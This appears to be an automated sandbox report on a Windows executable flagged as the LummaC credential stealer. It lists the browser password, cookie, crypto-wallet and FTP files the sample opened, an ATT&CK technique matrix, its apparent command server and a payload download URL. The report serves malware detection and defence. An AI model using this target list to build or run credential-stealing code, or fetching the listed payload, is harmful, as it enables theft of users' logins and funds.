Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC			Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 2608, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	12 Process Injection	1 Masquerading	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	34 Virtualization/Sandbox Evasion	LSASS Memory	751 Security Software Discovery	Remote Desktop Protocol	31 Data from Local System	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	34 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	51%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://property-imper.sbs/api9-	0%	Avira URL Cloud	safe
https://property-imper.sbs:443/apiicrosoft	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
property-imper.sbs	104.21.33.116	true	false	high
www.google.com	172.217.21.36	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
js.monitor.azure.com	unknown	unknown	false	high
mdec.nelreports.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://property-imper.sbs/api	false		high
https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf	chromecache_130.5.dr	false		high
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/	chromecache_130.5.dr	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.linkedin.com/cws/share?url=$	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Youssef1313	chromecache_130.5.dr	false		high
https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://aka.ms/msignite_docs_banner	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9	chromecache_122.5.dr	false		high
http://polymer.github.io/AUTHORS.txt	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml	chromecache_130.5.dr	false		high
https://management.azure.com/subscriptions?api-version=2016-06-01	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md	chromecache_130.5.dr	false		high
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pshelpmechoose	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://aka.ms/feedback/report?space=61	chromecache_130.5.dr, chromecache_131.5.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	false		high
https://learn-video.azurefd.net/vod/player	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://twitter.com/intent/tweet?original_referer=$	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://github.com/gewarren	chromecache_130.5.dr	false		high
http://185.215.113.16/off/def.exepleWebKit/537.36	file.exe, 00000000.00000002.2464188669.0000000000FCA000.00000004.00000010.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/CONTRIBUTORS.txt	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://property-imper.sbs/api9-	file.exe, 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md	chromecache_130.5.dr	false		high
https://property-imper.sbs:443/apiicrosoft	file.exe, 00000000.00000002.2464239287.0000000001291000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725	chromecache_130.5.dr	false		high
